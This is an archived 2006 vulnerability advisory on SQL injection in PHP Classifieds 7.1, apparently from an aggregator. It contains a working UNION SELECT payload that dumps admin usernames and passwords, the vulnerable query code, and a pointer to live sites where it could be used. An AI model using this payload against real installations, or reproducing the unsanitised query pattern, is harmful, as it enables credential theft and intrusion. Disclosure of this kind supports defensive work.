Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14548
HistoryOct 05, 2006 - 12:00 a.m.

PHP Classifieds 7.1 (index.php) Remote SQL Injection Vulnerability

2006-10-0500:00:00
vulners.com
26
JSON

Credit: Kzar [email protected]
kzar.co.uk/exploits/phpclassifieds_exploit

App Name: PHP Classifieds => 7.1
App URL: www.deltascripts.com/phpclassifieds
Problem: Multiple SQL Injection exploits

Exploit: search.php?catid_search=[sql]
index.php?catid=[sql]

Example: Puts Username and Password in the title and on the page
index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins

Context: These are the vulnerable queries
select cat_tpl from $cat_tbl where cat_id = ".$_REQUEST["catid_search"]
select cat_name,cat_tpl from $cat_tbl where cat_id = $catid

Google: Just go to http://www.deltascripts.com/phpclassifieds/livesites/

JSON